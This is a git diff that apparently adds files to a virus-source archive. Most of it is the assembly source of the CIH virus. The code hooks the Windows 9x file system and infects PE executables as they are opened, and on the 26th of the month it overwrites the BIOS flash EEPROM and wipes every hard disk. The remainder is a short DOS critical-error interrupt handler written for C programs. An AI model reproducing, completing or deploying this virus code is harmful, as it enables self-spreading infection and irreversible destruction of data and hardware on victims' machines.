IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + push eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + mov dr0, eax ; Adjust OldFileSystemApiHook Address + + pop eax + + pop ebx + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +OldInstallFileSystemApiHook dd ? 
+ +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* + +FileSystemApiHook: +@3 = FileSystemApiHook + + pushad + + call @5 ; +@5: ; + pop esi ; mov esi, offset VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 + +; ************************************* +; * Is OnBusy !? * +; ************************************* + + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc + +; ************************************* +; * Is OpenFile !? * +; ************************************* + + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook + +; ************************************* +; * Enable OnBusy * +; ************************************* + + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy + +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + + ; mov esi, offset FileNameBuffer + add esi, FileNameBuffer-@6 + + push esi + + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + + add al, 40h + mov ah, ':' + + mov [esi], eax + + inc esi + inc esi + +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. 
* +; ************************************* + +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h + +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + + ; cmp [esi+eax-04h], '.EXE' + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy + +IF DEBUG + +; ************************************* +; * Only for Debug * +; ************************************* + + ; cmp [esi+eax-06h], 'FUCK' + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy + +ENDIF + +; ************************************* +; * Is Open Existing File !? * +; ************************************* + + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy + +; ************************************* +; * Get Attributes of the File * +; ************************************* + + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + + jc DisableOnBusy + + push ecx + +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] + +; ************************************* +; * Is Read-Only File !? 
* +; ************************************* + + test cl, 01h + jz OpenFile + +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Open File * +; ************************************* + +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + + xchg ebx, eax ; mov ebx, FileHandle + +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + + pop ecx + + pushf + + test cl, 01h + jz IsOpenFileOK + +; ************************************* +; * Restore Attributes of the File * +; ************************************* + + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Is Open File OK !? * +; ************************************* + +IsOpenFileOK: + popf + + jc DisableOnBusy + +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + + push esi ; Push FileNameBuffer Address to Stack + + pushf ; Now CF = 0, Push Flag to Stack + + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer + +; *************************** +; * Get OffsetToNewHeader * +; *************************** + + xor eax, eax + mov ah, 0d6h + + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + + push 00000004h + pop ecx + push 0000003ch + pop edx + call edi ; VXDCall IFSMgr_Ring0_FileIO + + mov edx, [esi] + +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + + dec edx + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Is PE !? 
* +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** +; * WinZip Self-Extractor * +; * doesn't Have Infected * +; * Mark Because My Virus * +; * doesn't Infect it. * +; *************************** + + ; cmp [esi], '\0PE\0' + cmp dword ptr [esi], 00455000h + jne CloseFile + +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + + push ebx ; Save File Handle + + push 00h ; Set VirusCodeSectionTableEndMark + +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer + +; *************************** 
+; * Save ESP Register * +; *************************** + + mov dr1, esp + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + + push eax ; Size + +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer + +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] + +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + + mov al, SizeOfScetionTable + + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + + mul cl + +; *************************** +; * Let's Set Section Table * +; *************************** + + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer + +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + + inc ecx + push ecx ; Save NumberOfSections+1 + + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + + add ecx, eax + add ecx, edx + + sub ecx, (SizeOfHeaders-@9)[esi] + not ecx + inc ecx + + ; Save My Virus 
First Section Code + ; Size of Following Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + + xchg ecx, eax ; ECX = Size of Section Table + + ; Save Original Address of Entry Point + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax + + cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection + jl OnlySetInfectedMark + +; *************************** +; * Read All Section Tables * +; *************************** + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Full Modify the Bug : * +; * WinZip Self-Extractor * +; * Occurs Error... * +; *************************** +; * So When User Opens * +; * WinZip Self-Extractor, * +; * Virus Doesn't Infect it.* +; *************************** +; * First, Virus Gets the * +; * PointerToRawData in the * +; * Second Section Table, * +; * Reads the Section Data, * +; * and Tests the String of * +; * 'WinZip(R)'...... 
* +; *************************** + + xchg eax, ebp + + push 00000004h + pop ecx + + push edx + mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi] + add edx, 12h + + call edi ; VXDCall IFSMgr_Ring0_FileIO + + ; cmp [esi], 'nZip' + cmp dword ptr [esi], 'piZn' + je NotSetInfectedMark + + pop edx + +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + + push edi ; Size + + add edx, ebp + push edx ; Pointer of File + + add ebp, esi + push ebp ; Address of Buffer + +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + + lea eax, [ebp+edi-04h] + mov [eax], ebx + +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + + push ebx ; Size + + add edx, edi + push edx ; Pointer of File + + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer + +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + + mov (NewAddressOfEntryPoint-@9)[esi], edx + +; *************************** +; * Setup Initial Data * +; *************************** + + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + + jmp StartToWriteCodeToSections + +; *************************** +; * Write Code to Sections * +; *************************** + +LoopOfWriteCodeToSections: + + add edx, SizeOfScetionTable + + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + + push ebx ; Size + + sub eax, 08h + mov [eax], ebx + + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + + push edi ; Address of Buffer + + mov ebx, 
(VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. ==> 40000000h + or (Characteristics-@9)[edx], 40000040h + +StartToWriteCodeToSections: + + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + + add edi, ebx ; Move Address of Buffer + +EndOfWriteCodeToSections: + + loop LoopOfWriteCodeToSections + +; *************************** +; * Only Set Infected Mark * +; *************************** + +OnlySetInfectedMark: + mov esp, dr1 + + jmp WriteVirusCodeToFile + +; *************************** +; * Not Set Infected Mark * +; *************************** + +NotSetInfectedMark: + add esp, 3ch + + jmp CloseFile + +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** + +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx + +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. 
^__^ * +; *************************** + + lea eax, (LastVxDCallAddress-2-@9)[esi] + + mov cl, VxDCallTableSize + +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + + mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + + loop LoopOfRestoreVxDCallID + +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** + +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] + +LoopOfWriteVirusCodeToFile: + + pop ecx + jecxz SetFileModificationMark + + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + + call edi ; VXDCall IFSMgr_Ring0_FileIO + + jmp LoopOfWriteVirusCodeToFile + +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** + +SetFileModificationMark: + pop ebx + pop eax + + stc ; Enable CF(Carry Flag) + pushf + +; ************************************* +; * Close File * +; ************************************* + +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Need to Restore File Modification * +; * Time !? 
* +; ************************************* + + popf + pop esi + jnc IsKillComputer + +; ************************************* +; * Restore File Modification Time * +; ************************************* + + mov ebx, edi + + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Disable OnBusy * +; ************************************* + +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy + +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* + +prevhook: + popad + + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook + +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* + +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + + mov [ebx+1ch], eax ; Modify EAX Value in Stack + +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook + +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax + +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** + +QuitMyVirusFileSystemHook: + + popad + + ret + +; ************************************* +; * Kill Computer !? ... *^_^* * +; ************************************* + +IsKillComputer: + ; Get Now Day from BIOS CMOS + mov al, 07h + out 70h, al + in al, 71h + + xor al, 26h ; ??/26/???? 
+ +IF DEBUG + jmp DisableOnBusy +ELSE + jnz DisableOnBusy +ENDIF + +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] + +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi + +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi + +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... 
* +; *********************** + + lea ebx, EnableEEPROMToWrite-@10[esi] + + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + + push ecx + loop $ + +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + + xor ah, ah + mov [eax], al + + xchg ecx, eax + loop $ + +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + + loop $ + +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + + mov ah, 0e0h + mov [eax], al + +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi + +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? 
* +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + out dx, al + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath + +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'CIH v' + db MajorVirusVersion+'0' + db '.' 
+ db MinorVirusVersion+'0' + db ' TATUNG' + +; ********************************************************* +; * Virus Size * +; ********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? 
+SizeOfImageHeaderToRead = $-NumberOfSections + +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite = 04h + +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ + +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; ********************************************************* + +VirusGame ENDS + + END FileHeader \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cint.asm b/MSDOS/Virus.MSDOS.Unknown.cint.asm new file mode 100644 index 00000000..fc10d79b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cint.asm 
@@ -0,0 +1,226 @@
+ TITLE LC Interrupt trap routine
+ NAME LCINT
+ INCLUDE DOS.MAC ; BE SURE TO INCLUDE THE CORRECT
+ ; DOS.MAC!!
+
+;****************************************************************************
+;
+; This is the heart of a C driven interrupt handler. This file was used to
+; write a critical error handler that remained resident. (It replaced the
+; "Abort, Retry, Ignore" prompt with a window.) This file can be adapted to
+; any interrupt and any C routine with a little work. THIS HAS BEEN USED ONLY
+; IN THE S MODEL.
+;
+;****************************************************************************
+
+DOS_INT EQU 24H ; int to be replaced
+
+WRITE_INT EQU 25H ; DOS write int vector
+READ_INT EQU 35H ; DOS read int vector
+
+XREG STRUC
+REG_AX DW ? ; general purpose registers
+REG_BX DW ?
+REG_CX DW ?
+REG_DX DW ?
+REG_SI DW ?
+REG_DI DW ?
+XREG ENDS
+
+SREGS STRUC
+REG_ES DW ? ; segment registers
+REG_CS DW ?
+REG_SS DW ?
+REG_DS DW ?
+SREGS ENDS
+
+ DSEG
+
+ INT_REGS XREG <> ; saved regs. at int time
+ INT_SEGREGS SREGS <> ; saved seg. regs.
+ EXTRN _TOP:WORD ; declared by C.ASM -- points
+ ; to top of stack
+ ENDDS
+
+ EXTRN INTTIME:NEAR ; your int routine goes here!
+
+ PSEG
+;;
+; interrupt time data storage
+;;
+C_ENVIRONMENT_DS DW ? ; filled by int init, used...
+C_ENVIRONMENT_ES DW ? ; ...to recreate C environment
+C_ENVIRONMENT_SS DW ?
+C_ENVIRONMENT_SP DW ?
+
+INT_TIME_ES DW ?
+INT_TIME_DS DW ? ; temp save of DS at int time
+INT_TIME_SI DW ? ; temp save of SI at int time
+
+INT_TIME_BP DW ? ; added to account for no BP or SP...
+INT_TIME_SP DW ? ; ...in above structures
+
+RETURN_VALUE DW ? ; return value from C service routine
+
+DOS_SERVICE DD ? ; address of DOS Service routine
+INT_TWOONE DD ? ; old INT 21 vector
+
+INT_IN_PROGRESS DB ? ; interrupt in progress flag -- not
+ ; used here 'cause int 24H cannot be
+ ; recursive!
+
+;;**************************************************************************
+; name LC_SERVICE_INT
+;
+; description Entered at (software) interrupt time, this routine
+; restores the C enviroment and processes the interrupt
+; trapping all references to the quad file
+;;
+
+ IF LPROG
+LC_SERVICE_INT PROC FAR
+ ELSE
+LC_SERVICE_INT PROC NEAR
+ ENDIF
+
+ MOV CS:INT_IN_PROGRESS,1 ; clear int in progress flag
+
+ MOV CS:INT_TIME_ES,ES ; save ES so it can be overwritten
+ MOV CS:INT_TIME_DS,DS ; save DS so it can be overwritten
+ MOV CS:INT_TIME_SI,SI ; save SI so it can be overwritten
+ MOV CS:INT_TIME_BP,BP ; save BP as structs do not have it
+ MOV CS:INT_TIME_SP,SP ; save SP as structs do not have it
+
+ MOV DS,CS:C_ENVIRONMENT_DS ; set up C enviroment
+
+ MOV SI,OFFSET INT_REGS ; point to input regs struct
+
+ MOV DS:[SI].REG_AX,AX ; save general purpose regs
+ MOV DS:[SI].REG_BX,BX
+ MOV DS:[SI].REG_CX,CX
+ MOV DS:[SI].REG_DX,DX
+ MOV DS:[SI].REG_DI,DI
+ MOV AX,CS:INT_TIME_SI ; SI has been overwritten
+ MOV DS:[SI].REG_SI,AX
+
+ MOV SI,OFFSET INT_SEGREGS ; point to input segment regs struct
+
+ MOV AX,CS:INT_TIME_ES ; ES has been overwritten
+ MOV DS:[SI].REG_ES,AX
+ MOV DS:[SI].REG_SS,SS
+ MOV AX,CS:INT_TIME_DS ; DS has been overwritten
+ MOV DS:[SI].REG_DS,AX
+
+ MOV ES,CS:C_ENVIRONMENT_ES ; complete C environment
+ MOV SS,CS:C_ENVIRONMENT_SS
+ MOV SP,CS:C_ENVIRONMENT_SP
+
+ CALL INTTIME ; call the C routine
+ MOV CS:RETURN_VALUE,AX ; save return value
+ XOR AX,AX
+
+ MOV SI,OFFSET INT_REGS ; point to input regs struct
+
+ MOV AX,DS:[SI].REG_SI ; SI needs to be saved while used
+ MOV CS:INT_TIME_SI,AX
+
+ MOV AX,DS:[SI].REG_AX ; restore general purpose regs
+ MOV BX,DS:[SI].REG_BX
+ MOV CX,DS:[SI].REG_CX
+ MOV DX,DS:[SI].REG_DX
+ MOV DI,DS:[SI].REG_DI
+
+ MOV SI,OFFSET INT_SEGREGS ; point to input segment regs struct
+
+ MOV ES,DS:[SI].REG_DS ; DS needs to be saved while used
+ MOV CS:INT_TIME_DS,ES
+
+ MOV ES,DS:[SI].REG_ES
+ MOV SS,DS:[SI].REG_SS
+
+ MOV SI,CS:INT_TIME_SI ; restore pointing registers
+ MOV DS,CS:INT_TIME_DS
+
+ MOV BP,CS:INT_TIME_BP ; special BP restore
+ MOV SP,CS:INT_TIME_SP ; special SP restore
+
+ MOV CS:INT_IN_PROGRESS,0 ; clear int in progress flag
+
+ MOV AX,CS:RETURN_VALUE ; move the return value
+ IRET ; return from interrupt
+
+LC_SERVICE_INT ENDP
+
+;****************************************************************************
+; description set up the LC interrupt routines
+;
+; INT_INIT -- Hooks into the specified int.
+; INT_TERM -- Unhooks (restores) the specified int.
+;
+; NOTE: INT_INIT must be called be int processing can begin...it saves the
+; current C environment for use at interrupt time.
+;;
+
+ PUBLIC INT_INIT
+ IF LPROG
+INT_INIT PROC FAR
+ ELSE
+INT_INIT PROC NEAR
+ ENDIF
+
+ PUSH DS ; save changed seg regs
+ PUSH ES
+
+ MOV CS:C_ENVIRONMENT_DS,DS ; save C environment for int time
+ MOV CS:C_ENVIRONMENT_ES,ES
+ MOV CS:C_ENVIRONMENT_SS,SS
+
+ MOV AX,_TOP ; determine int time SP
+ SUB AX,400H ; gives 1024 byte stack
+ MOV CS:C_ENVIRONMENT_SP,AX
+
+ MOV AH,READ_INT ; read int vector function
+ MOV AL,DOS_INT ; specify DOS service vector
+ INT 21H
+
+ MOV WORD PTR CS:DOS_SERVICE+2,ES ; save current vector
+ MOV WORD PTR CS:DOS_SERVICE,BX
+
+ LEA DX,LC_SERVICE_INT ; Use DOS to set new int address
+ PUSH CS
+ POP DS
+ MOV AH,WRITE_INT
+ MOV AL,DOS_INT
+ INT 21H
+
+ POP ES ; restore changed seg regs
+ POP DS
+ RET
+
+INT_INIT ENDP
+
+;********************* INT_TERM -- kill ints. *******************************
+
+ PUBLIC INT_TERM
+ IF LPROG
+INT_TERM PROC FAR
+ ELSE
+INT_TERM PROC NEAR
+ ENDIF
+
+ PUSH DS ; DS gets changed
+
+ MOV DS,WORD PTR CS:DOS_SERVICE+2 ; Restore previous DOS service vector
+ MOV DX,WORD PTR CS:DOS_SERVICE
+ MOV AH,WRITE_INT
+ MOV AL,DOS_INT
+ INT 21H
+
+ POP DS ; restore DS
+ RET
+INT_TERM ENDP
+
+ ENDPS
+
+ END
+
\ No newline at end of file
